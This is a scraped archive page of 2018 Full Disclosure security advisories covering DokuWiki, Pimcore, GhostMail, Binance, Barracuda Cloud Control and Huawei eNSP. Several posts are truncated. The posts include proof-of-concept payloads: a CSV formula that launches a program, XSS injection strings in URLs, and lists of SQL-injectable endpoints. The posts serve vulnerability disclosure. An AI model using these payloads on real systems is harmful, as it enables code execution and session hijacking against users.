SEC Consult Vulnerability Lab

SEC Consult
Europe |

[FD] SEC Consult SA-20180906-0 :: CSV Formula Injection in DokuWiki

2018-09-06 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180906-0 >
===
  title: CSV Formula Injection
product: DokuWiki
 vulnerable version: 2018-04-22a "Greebo" and older versions
  fixed version: None
 CVE number: CVE-2018-15474
 impact: Medium
   homepage: https://www.dokuwiki.org
  found: 2018-07-09
 by: Jean-Benjamin Rousseau (Office Zurich)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"DokuWiki is a simple to use and highly versatile Open Source wiki software
that doesn't require a database. It is loved by users for its clean and
readable syntax. The ease of maintenance, backup and integration makes it
an administrator's favorite. Built in access controls and authentication
connectors make DokuWiki especially useful in the enterprise context
and the large number of plugins contributed by its vibrant community allow
for a broad range of use cases beyond a traditional wiki."

Source: https://www.dokuwiki.org/dokuwiki


Business recommendation:

The issue will not be fixed according to the vendor. Users are advised
to be careful when opening files via the CSV export functionality.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) CSV Formula Injection vulnerability
The administration panel of the application has a "CSV export of users"
feature which allows the export of user data (username, real name,
email address and user groups) as a CSV file. On the registration page,
it is possible for an attacker to set certain values in the Real Name field
that - when exported and opened with a spreadsheet application
(Microsoft Excel, Open Office, etc.) - will be interpreted as a formula.
This puts the administrators who open those malicious exported files at risk.
Exfiltration of sensitive data or even the execution of arbitrary code
on the local machine of the victim will be the result. The final impact
depends on the used spreadsheet software on the client of the victim.


Proof of concept:
-
1) CSV Formula Injection vulnerability
Registration URL:
http://www.example.com/doku.php?id=start&do=register

When the registration request is submitted, the following parameters are sent
in a POST request:

sectok=&do=register&save=1&login=login_parameter&fullname=evil_csv_formula_injection_payload&email=email_address

The "fullname" parameter is not sanitized before being stored and during
the CSV export. An attacker can inject different CSV formula
payloads in the fullname parameter.
For example:
=cmd|'/C calc'!A0

As soon as the file gets opened in Microsoft Excel, the program calc.exe is
launched. Different warnings might pop up. However, these warnings are usually
ignored because the file comes from a trusted source.


Vulnerable / tested versions:
-
The latest version 2018-04-22a "Greebo" has been tested:
https://download.dokuwiki.org/out/dokuwiki-8a269cc015a64b40e4c918699f1e1142.tgz

Also found to be vulnerable:
 2017-02-19 stable release
 2016-06-26 stable release
 2015-08-10 stable release
 2014-09-29 stable release
 2014-05-05 stable release
 2013-12-08 stable release


Vendor contact timeline:

2018-07-18: Contacting vendor through a...@splitbrain.org
2018-07-18: Vendor replied, they asked for the advisory without encryption
2018-07-19: Advisory sent without encryption
2018-07-19: Vendor replied with no intention to fix the vulnerability
2018-07-30: Reminder sent to the vendor. No reply
2018-08-20: Ask for updates to the vendor
2018-08-20: Vendor replied that no patch will be provided
2018-09-06: Public release of security advisory


Solution:
-
The issue will not be fixed according to the vendor:
https://github.com/splitbrain/dokuwiki/issues/2450


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality

[FD] SEC Consult SA-20180813-0 :: SQL Injection, XSS & CSRF vulnerabilities in Pimcore

2018-08-16 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180813-0 >
===
  title: SQL Injection, XSS & CSRF vulnerabilities
product: Pimcore
 vulnerable version: 5.2.3 and below
  fixed version: 5.3.0
 CVE number: CVE-2018-14057, CVE-2018-14058, CVE-2018-14059
 impact: High
   homepage: https://pimcore.com/en
  found: 2018-06-11
 by: T. Silpavarangkura (Office Bangkok)
 N. Rai-Ngoen (Office Bangkok)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Pimcore is an award-winning consolidated open source enterprise platform for
master data management (PIM/MDM), user experience management (CMS/UX), digital
asset management (DAM) and eCommerce."

Source: https://pimcore.com/en


Business recommendation:

The vendor provides a patch for most identified issues, but XSS will not be 
fixed
according to the vendor.

An in-depth security analysis performed by security professionals is highly
advised, as the software may be affected from further security issues.


Vulnerability overview/description:
---
1. SQL Injection (CVE-2018-14058)
Multiple SQL injection vulnerabilities have been identified in the REST web
service API. An attacker who obtains a valid API key that is granted a
necessary permission could successfully perform an attack to extract
information from the database.

2. Stored Cross-site Scripting (CVE-2018-14059)
Multiple stored cross-site scripting vulnerabilities have been identified
across multiple functions in the application, which allows an authenticated
attacker to insert arbitrary JavaScript code in virtually all text fields and
data entries in the application.

3. Cross-site Request Forgery (CVE-2018-14057)
Multiple functions in the application are not protected by the existing
anti-CSRF token, which allows an attacker to perform a cross-site request
forgery attack to at least add, update or delete entries, among other actions.


Proof of concept:
-
1. SQL Injection (CVE-2018-14058)
The following URLs demonstrate the issue:
http:///webservice/rest/asset-count?apikey=[...]&condition=
http:///webservice/rest/asset-inquire?apikey=[...]&id=
http:///webservice/rest/asset-list?apikey=[...]&condition=
http:///webservice/rest/document-count?apikey=[...]&condition=
http:///webservice/rest/document-inquire?apikey=[...]&id=
http:///webservice/rest/document-list?apikey=[...]&condition=
http:///webservice/rest/object-count?apikey=[...]&condition=
http:///webservice/rest/object-inquire?apikey=[...]&id=
http:///webservice/rest/object-list?apikey=[...]&condition=

Note that a valid API key that is granted at least either "Assets", "Documents"
or "Objects" permission is required to perform an SQL injection attack against
associated API endpoints successfully.


2. Stored Cross-site Scripting (CVE-2018-14059)
Most of the text fields in pop-up dialogs and data entries in the application
are vulnerable to the cross-site scripting vulnerability, which can be
exploited by an authenticated attacker. For example, the attacker could insert
an attack payload while performing at least the following actions:

1) Edit a user account's first name/last name/e-mail address.
2) Edit a Document Types/Predefined Properties/Predefined Asset Metadata/
Quantity Value/Static Routes entry value in the table.
3) Rename an Assets/Data Objects/Video Thumbnails/Image Thumbnails/
Field-Collections/Objectbrick/Classification Store item.


The vendor stated that many identified XSS issues only affect administrative
functions and hence the issues will not be fixed:
"They are only affecting administrative functionalities (higher privileges
required) - so this isn't used by non-trusted users - a check just adds
additional overhead without any benefits for security."

SEC Consult argued multiple times that XSS can still be exploited e.g. when a
higher privileged user gets attacked and the issues should be fixed 
nevertheless.


3. Cross-site Request Forgery (CVE-2018-14057)
The existing anti-CSRF token in the HTTP request header named
"X-pimcore-csrf-token" was found to be validated only in the "Settings >
Users / Roles" function. Therefore, an attacker could perform a cross-site
request forgery attack against virtually all other functions in order to
at least add, update and delete data without having to submit the anti-CSRF
token.

The non-exhaustive list of affected requests are listed below:
POST /admin/asset/a

[FD] Adobe Patches Vulnerability Affecting Internal Systems

2018-07-20 Thread Vulnerability Lab 
Title: Adobe Patches Vulnerability Affecting Internal Systems
Source:
https://www.securityweek.com/adobe-patches-vulnerability-affecting-internal-systems

Title: Adobe on internal systems security hole
Source: https://www.theregister.co.uk/2018/07/19/adobe_internal_systems_bug/

References: Hacker Injects Arbitrary Codes to Main Lead Database of
Adobe Systems
https://www.vulnerability-db.com/?q=articles/2018/07/19/hacker-injects-arbitrary-codes-main-lead-database-adobe-systems

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Adobe Systems - Arbitrary Code Injection Vulnerability

2018-07-19 Thread Vulnerability Lab 
d and the case scenario has been
full transparent delivered to ensure the problematic becomes visible to
adobe.
(Example:
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343&p1=%40HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D)


Security Risk:
==
The security risk of the arbitrary code injection vulnerability in the
adobe web services are estimated as high.


Credits & Authors:
==
Benjamin K.M. (Vulnerability Laboratory Core Research
Team)[resea...@vulnerability-lab.com] -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
-
www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php-
vulnerability-lab.com/list-of-bug-bounty-programs.php   -
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   -
vulnerability-lab.com/rss/rss_upcoming.php  -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
-
youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact (admin@) to get an ask
permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] GhostMail - (Status Message) Persistent Web Vulnerability

2018-07-18 Thread Vulnerability Lab 
Document Title:
===
GhostMail - (Status Message) Persistent Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1470


Release Date:
=
2018-06-27


Vulnerability Laboratory ID (VL-ID):

1470


Common Vulnerability Scoring System:

4


Vulnerability Class:

Script Code Injection


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Sign up to military grade encrypted GhostMail and enjoy instant free and
secure email & chat. No download or installs needed.
GhostMail is your new secure email & chat platform, with great features
like self destruction, two factor login and much more...
Join free today and start enforcing your privacy and online rights.

(Copy of the Vendor Homepage: https://www.ghostmail.com/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered an
application-side vulnerability in the official GhostMail chat online
service web-application.


Vulnerability Disclosure Timeline:
==
2018-06-27: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

GhostCom Ltd.
Product: GhostMail (Chat) - Web Application (Online Service) 2015 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
Low User Interaction


Disclosure Type:

Bug Bounty Program


Technical Details & Description:

An application-side html injection web vulnerability has been discovered
in the official GhostMail chat web-application.
The vulnerability allows to inject unauthorized malicious script codes
on the application-side of the affected module.

The issue exists in chat status of the application and is remotly
exploitable against other ghostmail user accounts.
The request method to inject is POST and the attack vector is located on
the application-side of the affected online
service web-application. The encoding of the status message in the chat
client is broken. Local and remote attackers
can use the lack of validation to perform html injection attacks to
compromise user/moderator/admin session data.

The security risk of the html injection web vulnerability is estimated
as medium with a cvss count of 4.0.
Exploitation of the issue requires a low privileged web-application user
account and no direct user interaction.
Successful exploitation of the application-side vulnerability results in
session hijacking, persistent phishing,
persistent external redirects and persistent manipulation affected or
connected module context.

Vulnerable Domain(s):
[+] Ghostmail.com

Vulnerable Module(s):
[+] Status Message

Vulnerable Parameter(s):
[+] Status message body context


Proof of Concept (PoC):
===
The html injection web vulnerability can be exploited by local and
remote attackers with low user interaction and low privileged
application user account.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.

Manual Steps to reproduce the vulnerability ...
1. Register an account and login to the ghostmail application
2. Move to the chat status contents
3. Close the tag of title with double quote "
4. Now, add a new malicious content as payload in the status title  for
the chat
5. Start to chat and in the same moment the execution of the script code
occurs at both party sides of the client
6. Successful reproduce of the vulnerability!

Note: There is no filter validation or mechanism in place to prevent an
execution within the ghostmail web-application.

Reference(s):
https://www.ghostmail.com/


Solution - Fix & Patch:
===
The vulnerability can be patched by a parse and encode of the vulnerable
status mesage in the ghostmail chat client.
The issue has been reported in 2016 Q4 (2016-10-01) and was finally
resolved in 2017 Q3 - Q4 by the ghostmail developer team.


Security Risk:
==
The security risk of the application-side input validation web
vulnerability in the chat module is estimated as medium (CVSS 4.0).


Credits & Authors:
==========
Vulnerability-Lab [resea...@vulnerability-lab.com] -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantabilit

[FD] GhostMail - (filename to link) POST Inject Web Vulnerability

2018-07-18 Thread Vulnerability Lab 
he input and disallow special chars. Escape the web context to
prevent an application-side script code execution vulnerability.

The vulnerability has been reported 2016-10-01. The issue was resolved
during the 2017 Q2 - Q4 by the ghost mail developer team.


Security Risk:
==
The security risk of the application-side input validation web
vulnerability in the ghostmail mail module is estimated as medium (CVSS
4.2).


Credits & Authors:
==
Vulnerability-Lab [resea...@vulnerability-lab.com] -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
-
www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php-
vulnerability-lab.com/list-of-bug-bounty-programs.php   -
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   -
vulnerability-lab.com/rss/rss_upcoming.php  -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
-
youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact (admin@) to get an ask
permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Binance v1.5.0 - Insecure File Permission Vulnerability

2018-07-18 Thread Vulnerability Lab 
Document Title:
===
Binance v1.5.0 - Insecure File Permission Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2135


Release Date:
=
2018-07-17


Vulnerability Laboratory ID (VL-ID):

2135


Common Vulnerability Scoring System:

2.5


Vulnerability Class:

Access Permission Weakness


Current Estimated Price:

500€ - 1.000€


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered an
insecure file permission vulnerability in the Binance v1.5.0 software.



Vulnerability Disclosure Timeline:
==
2018-07-15: Researcher Notification & Coordination (Security Researcher)
2018-07-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Binance
Product: Binance 1.5.0


Exploitation Technique:
===
Local


Severity Level:
===
Low


Authentication Type:

Full authentication (admin) - full privileges


User Interaction:
=
Medium User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

Insecure File Permissions vulnerability has been discovered in the
official Binance v1.5.0 software.
The vulnerability allows local attackers to exploit insecure permissions
setup for a software or process to exploit by manipulation.

The vulnerability exists due to insecure default permissions set on the
Binance.exe, start.exe and unins000.exe
There are no integrity checks or validation proof to ensure that the
executable file is not modified
during the runtime or after it.
A local attacker could exploit the local vulnerability by replacing
`Binance.exe` and `start.exe` or `unins000.exe` with a
malicious executable file.  The malicious file could execute or modify
with the LocalSystem permissions to followup with
successful exploitation.


Proof of Concept (PoC):
===
Binance for windows contains a vulnerability that could allow a local
attacker to gain elevated privileges.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below.


-- PoC Session Logs (Permissions) --
C:Binance>icacls binance.exe
Binance.exe BUILTINAdministrateurs:(I)(F) <--- Full Access
 AUTORITE NTSystème:(I)(F)
 BUILTINUtilisateurs:(I)(RX)
 AUTORITE NTUtilisateurs authentifiés:(I)(M)   <--- Modify

Information: 1 files correctly processed; 0 files failed to process

C:Binance>icacls start.exe
start.exe BUILTINAdministrateurs:(I)(F) <--- Full Access
 AUTORITE NTSystème:(I)(F)
 BUILTINUtilisateurs:(I)(RX)
 AUTORITE NTUtilisateurs authentifiés:(I)(M) <--- Modify

Information: 1 files correctly processed; 0 files failed to process

C:Binance>icacls unins000.exe
unins000.exe BUILTINAdministrateurs:(I)(F)   <--- Full Access
 AUTORITE NTSystème:(I)(F)
 BUILTINUtilisateurs:(I)(RX)
 AUTORITE NTUtilisateurs authentifiés:(I)(M)<--- Modify

Information: 1 files correctly processed; 0 files failed to process


Solution - Fix & Patch:
===
Include multiple integrity checks for the software files on startup and
during the static runtime.
Change the access permissions for the process of all three executables
files (binance.exe, stat.exe & uninst00.exe).


Security Risk:
==
The security risk of the insecure file permissions vulnerability and
missing integrity check in the software core is estimated as low.


Credits & Authors:
==
ZwX [Vulnerability Laboratory - Security Manager] -
https://www.vulnerability-lab.com/show.php?user=ZwX


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   www.vuln-lab.com

www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com  paste.vulnerability

[FD] Barracuda Cloud Control 7.1.1.003 - Cross Site Scripting Vulnerability

2018-07-18 Thread Vulnerability Lab 
ank You   



Your Barracuda Networks user has been created.
Please follow the instructions emailed to b...@evolution-sec.com
20%3E%3Ca%20%3E%20>"<%20
to log in and create an account.



.create_success {
padding: 15px;
background: url('/cui/images/checkbox.png') center 50px no-repeat;
text-align: center;
}
.create_success h2 {
font-size: 150%;
padding-bottom: 90px;
}
.create_success p {
font-size: 125%;
text-align: center;
}


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET
https://cc.localhost:8000/new_user/success/?email=bkm%40evolution-sec.com%20%3E%3Ca%20%3E%20>"<%20
Mime Type[text/html]
Request Header:
  Host[cc.localhost:8000]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0)
Gecko/20100101 Firefox/49.0]

Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Cookie[backup_session=03d2d8r7cf752jknkc9esfhet5;
CLOUD_LOCALE=en_US; BNI_CLOUD_AT=1f20800a5000;
_ga=GA1.2.1374742774.1477554133; _gat=1; mfa=0;
CLOUD_LAST_LOCALE=en_US; cloud_session=44kti8ik7qdnb57kdfftfehje3]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
Response Header:
  Date[x]
  X-Frame-Options[SAMEORIGIN]
  Cache-Control[no-store, no-cache, must-revalidate, post-check=0,
pre-check=0]
  Pragma[no-cache]
  Set-Cookie[CLOUD_LOCALE=en_US; expires=Tue, 25-Apr-2017 07:44:45
GMT; Max-Age=15552000; path=/; domain=.localhost:8000; secure
cloud_session=44kti8ik7qdnb57kdfftfehje3; path=/; domain=.localhost:8000
BNI_CLOUD_AT=1f20800a5000; Path=/]
  X-Cloud-Auth[0]
  Vary[Accept-Encoding,User-Agent]
  Connection[Keep-Alive]
  Content-Type[text/html; charset=UTF-8]
  Transfer-Encoding[chunked]


Reference(s):
https://cc.localhost:8000/
https://cc.localhost:8000/new_user/
https://cc.localhost:8000/new_user/success/


Solution - Fix & Patch:
===
The vulnerability can be patched by a parse of the vulnerable email
parameter in the thank you registration page of barracuda networks cc
application.
Parse in the vulnerable output location the source to prevent the
execution of the client-side injected payloads. Disallow the usage of
special chars
on parameter requests via GET method.


Security Risk:
==
The security risk of the client-side cross site scripting web
vulnerability in the cloud control web-application is estimated as medium.


Credits & Authors:
==
Benjamin K.M. (Vulnerability Laboratory Core Research Team) -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
-
www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php-
vulnerability-lab.com/list-of-bug-bounty-programs.php   -
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   -
vulnerability-lab.com/rss/rss_upcoming.php  -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
-
youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To

[FD] Barracuda Cloud Control v3.020 - CS Cross Site Vulnerability

2018-07-18 Thread Vulnerability Lab 
oss Site Scripting PoC
https://bcc.127.0.0.1:1336/cgi-mod/index.cgi?password=befc663e87db8e886c5d8afe5f73cc3e&et=1342741957&;
primary_tab=BASIC&new_secondary_tab=user_management&auth_type=Local&nodeid=13633&locale=de_DE&
secondary_tab=edit_user&page_submitted=550a4ef30b4d0aa5d5435c2f09b3c09c&content_only=1&target_user=
1337benny%40barracuda.com">http://www.vulnerability-lab.com
onload=alert("VulnerabilityLab") <
&tree_name=devices&tree_filter=bccadmin&user=benny%40barracuda.com&ispopup=1&parent_name=
user_management&popup_width=800&popup_height=500>




PoC: INDEX.CGI - Mail Listing (Output) (Benutzer bearbeiten >
Benutzerspezifische Bayessche Daten) [target_user]

 
Benutzerspezifische Bayessche Daten:
1337be...@barracuda.com"><[EXECUTION OF
CLIENT SIDE SCRIPT CODE!])' <<="" td="">
 



Reference(s):
https://bcc.127.0.0.1:1336/
https://bcc.127.0.0.1:1336/cgi-mod/
https://bcc.127.0.0.1:1336/cgi-mod/index.cgi


Solution - Fix & Patch:
===
The vulnerability can be patched by a secure parse and encode of the
vulnerable index.cgi file.
Restrict the input of the vulnerable marked values and disallow the
usage of special chars.
Use entities and filter all inputs with an exception-handling to prevent
client-side exploitation.


Note: The issue was reported in 2016 Q4 to the barracuda networks
developer team. The issue was finally resolved in 2017 Q3 - Q4.
The disclosure process took about 8month to complete by recognizing the
patch cycle.


Security Risk:
==
The security risk of the non-persistent cross site scripting
vulnerability in the target_user value parameter is estimated as medium.


Credits & Authors:
==
Vulnerability-Lab [resea...@vulnerability-lab.com] -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
-
www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php-
vulnerability-lab.com/list-of-bug-bounty-programs.php   -
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   -
vulnerability-lab.com/rss/rss_upcoming.php  -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
-
youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact (admin@) to get an ask
permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Huawei eNSP v1 - Buffer Overflow (DoS) Vulnerability

2018-07-13 Thread Vulnerability Lab 
Document Title:
===
Huawei eNSP v1 - Buffer Overflow (DoS) Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2132

Security ID: huawei-sa-20180309-01-ensp

https://nvd.nist.gov/vuln/detail/CVE-2017-17321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17321

Acknowledgements:
https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20180309-01-ensp-en

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-17321

CVE-ID:
===
CVE-2017-17321


Release Date:
=
2018-07-13


Vulnerability Laboratory ID (VL-ID):

2132


Common Vulnerability Scoring System:

3.3


Vulnerability Class:

Buffer Overflow


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Enterprise Network Simulation Platform (eNSP) is a free, scalable, and
graphic network simulation platform developed by Huawei.
Huawei eNSP is a management and support software as service.

(Copy of the Homepage:
https://support.huawei.com/enterprise/en/network-management/ensp-pid-9017384
)


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a buffer
overflow causing a denial of service in the official Huawei eNSP v1.


Vulnerability Disclosure Timeline:
==
2018-07-13: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Huawei
Product: eNSP v100R002C00B510 v100R002C00B500

Huawei
Product: eNSP V100R002C00B390 V100R002C00B380 V100R002C00B370 V100R002C00B

Huawei
Product: eNSP V100R002C00B210 V100R002C00B200

Huawei
Product: eNSP V100R002C00B120 V100R002C00B110 V100R002C00B100


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
No User Interaction


Disclosure Type:

Responsible Disclosure Program


Technical Details & Description:

A buffer overflow causing a denial of service vulnerability has been
discovered in the official Huawei eNSP v1.
The vulnerability allows to an attacker to crash or shutdown the
software process by unexpected behavior.

Huawei eNSP is vulnerable to a buffer overflow resulting in a denial of
service, caused by improper validation of
specific command line parameter. A local authenticated attacker could
exploit the vulnerability to cause the software
process to become abnormal with unexpected behavior and unhandled errors
by sending a special crafted paket requests.


Solution - Fix & Patch:
===
Huawei has released software updates to fix this security vulnerability.
Customers of the product should contact Huawei
TAC (Huawei Technical Assistance Center) to request the upgrades
contents. This advisory is available at the following
link:
http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20180309-01-ensp-en


Security Risk:
==
The security risk of the buffer overflow causing a denial of service and
unhandled unexpected errors in the huawei ensp v1 is estimated as medium.


Credits & Authors:
